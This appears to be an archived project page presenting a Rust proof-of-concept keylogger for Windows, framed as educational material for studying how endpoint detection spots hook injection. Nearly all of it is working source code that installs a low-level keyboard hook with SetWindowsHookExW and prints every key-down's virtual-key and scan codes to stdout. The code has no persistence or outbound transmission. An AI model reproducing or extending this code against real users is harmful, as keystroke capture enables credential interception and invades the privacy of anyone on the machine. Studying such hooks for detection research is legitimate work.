EXPERIMENT_ID: 001

Rust Keylogger PoC

ARCHIVED

A Windows-based keylogger demonstrating the usage of SetWindowsHookEx and proper hook chaining for educational detection analysis.

OBJECTIVE

Understand how Windows messaging hooks can be abused for credential interception and how EDRs detect hook injection.

CONSTRAINTS

Educational purpose only. Does not persist across reboots. Logs to stdout only.

Rust WinAPI Unsafe

src/main.rs

1use std::ptr;
2use winapi::shared::minwindef::{LPARAM, LRESULT, WPARAM};
3use winapi::shared::windef::HHOOK;
4use winapi::um::winuser::{
5    CallNextHookEx, DispatchMessageW, GetMessageW, SetWindowsHookExW,
6    TranslateMessage, UnhookWindowsHookEx, WH_KEYBOARD_LL, KBDLLHOOKSTRUCT,
7};
8
9static mut HOOK: HHOOK = ptr::null_mut();
10
11unsafe extern "system" fn keyboard_proc(
12    n_code: i32,
13    w_param: WPARAM,
14    l_param: LPARAM,
15) -> LRESULT {
16    if n_code >= 0 {
17        let kb = &*(l_param as *const KBDLLHOOKSTRUCT);
18        // WM_KEYDOWN = 0x0100
19        if w_param as u32 == 0x0100 {
20            println!("[KEY] vkCode={:03} scanCode={:#06x}", kb.vkCode, kb.scanCode);
21        }
22    }
23    CallNextHookEx(HOOK, n_code, w_param, l_param)
24}
25
26fn main() {
27    unsafe {
28        HOOK = SetWindowsHookExW(WH_KEYBOARD_LL, Some(keyboard_proc), ptr::null_mut(), 0);
29        assert!(!HOOK.is_null(), "Failed to install hook");
30
31        let mut msg = std::mem::zeroed();
32        while GetMessageW(&mut msg, ptr::null_mut(), 0, 0) > 0 {
33            TranslateMessage(&msg);
34            DispatchMessageW(&msg);
35        }
36        UnhookWindowsHookEx(HOOK);
37    }
38}

READ_ONLY_MODEUTF-8